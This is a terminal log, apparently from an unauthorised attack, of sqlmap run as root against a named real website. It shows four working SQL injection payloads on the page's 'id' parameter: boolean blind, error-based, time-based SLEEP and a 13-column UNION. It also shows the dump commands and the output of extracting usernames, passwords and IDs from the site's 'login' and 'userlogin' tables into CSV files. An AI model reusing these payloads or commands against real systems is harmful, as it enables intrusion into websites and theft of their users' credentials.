[09:07:25] [INFO] fetching entries of column(s) 'ID, email, name, password, username' for table 'login' in database 'acfmissi_acfmdb'
[09:07:25] [INFO] the SQL query used returns 9 entries
[09:07:33] [INFO] analyzing table dump for possible password hashes
Database: acfmissi_acfmdb
Table: login
[9 entries]
[09:07:33] [INFO] table 'acfmissi_acfmdb.login' dumped to CSV file '/root/.sqlmap/output/acfmission.org/dump/acfmissi_acfmdb/login.csv'
[09:07:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/acfmission.org'
root@BitCoin:/home/helmi# sqlmap -u http://acfmission.org/acfmdisp.php?id=29 -D acfmissi_acfmdb -T userlogin -C Username,Password,ID --dump
[*] starting at 09:12:28

[09:12:28] [INFO] resuming back-end DBMS 'mysql'
[09:12:29] [INFO] testing connection to the target URL
[09:12:30] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=29 OR NOT 3833=3833#

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=29 OR (SELECT 4234 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT (ELT(4234=4234,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
Payload: id=29 OR (SELECT * FROM (SELECT(SLEEP(5)))dSer)

Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: id=29 UNION ALL SELECT NULL,CONCAT(0x7178706271,0x636c49464162666d765a464c537a534a6f62594a5248666d444b584178796967557a494864566145,0x716a717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[09:12:30] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.31, Apache 2.4.27
back-end DBMS: MySQL 5.0
[09:12:30] [INFO] fetching entries of column(s) 'ID, Password, Username' for table 'userlogin' in database 'acfmissi_acfmdb'
[09:12:31] [INFO] the SQL query used returns 2 entries
[09:12:33] [INFO] analyzing table dump for possible password hashes
Database: acfmissi_acfmdb
Table: userlogin
[2 entries]
[09:12:33] [INFO] table 'acfmissi_acfmdb.userlogin' dumped to CSV file '/root/.sqlmap/output/acfmission.org/dump/acfmissi_acfmdb/userlogin.csv'
[09:12:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/acfmission.org'
root@BitCoin:/home/helmi#